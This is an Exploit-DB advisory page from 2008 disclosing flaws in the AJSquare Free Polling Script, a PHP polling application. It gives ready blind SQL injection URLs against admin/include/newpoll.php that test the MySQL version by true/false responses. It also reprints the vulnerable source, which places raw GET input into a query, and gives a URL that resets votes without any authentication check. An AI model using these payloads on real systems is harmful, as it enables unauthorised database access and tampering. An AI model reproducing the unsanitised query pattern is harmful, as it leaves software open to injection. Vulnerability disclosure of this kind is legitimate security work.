Lucene search

K
exploitdbG4N0KEDB-ID:7086
HistoryNov 10, 2008 - 12:00 a.m.

AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities

2008-11-1000:00:00
G4N0K
www.exploit-db.com
34

AI Score

7.4

Confidence

Low

EPSS

0.003

Percentile

69.2%

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	AJSquare Free Polling Script (DB) Multiple Vulnerabilities
==============================================================================

	[ร‚ยป] Script:             [ AJSquare Free Polling Script DataBase Version ]
	[ร‚ยป] Language:           [ PHP ]
	[ร‚ยป] Website:            [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ]
	[ร‚ยป] Type:               [ Free ]
	[ร‚ยป] Report-Date:        [ 10.11.2008 ]
	[ร‚ยป] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ XPL ]===

	[1][!] Blind SQLi (MQ = off)
		[ร‚ยป] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/*		True
		[ร‚ยป] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/*		False
		
		[../admin/include/newpoll.php]
		
			<?php
			require 'connect.php';
			$ques = $_GET[ques];
			$total = $_GET[total];
			for($i=1;$i<=$total;$i++)
				{
					$val[] = array($_GET["val".$i]);
				}

			$sqlnew = "select * from newpoll where question='$ques'";
			$resnew = mysql_query($sqlnew);
			
		[../admin/include/newpoll.php]
	
	
	

	[2][!] Reset Votes - Just call resetvote.php ;)
		[ร‚ยป] http://127.0.0.1/[path]/admin/resetvote.php


	
	
===[ Greetz ]===

	[ร‚ยป] ALLAH
	[ร‚ยป] Tornado2800 <Tornado2800[at]gmail.com>
	[ร‚ยป] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit();
===============================================================================

# milw0rm.com [2008-11-10]

AI Score

7.4

Confidence

Low

EPSS

0.003

Percentile

69.2%

Related for EDB-ID:7086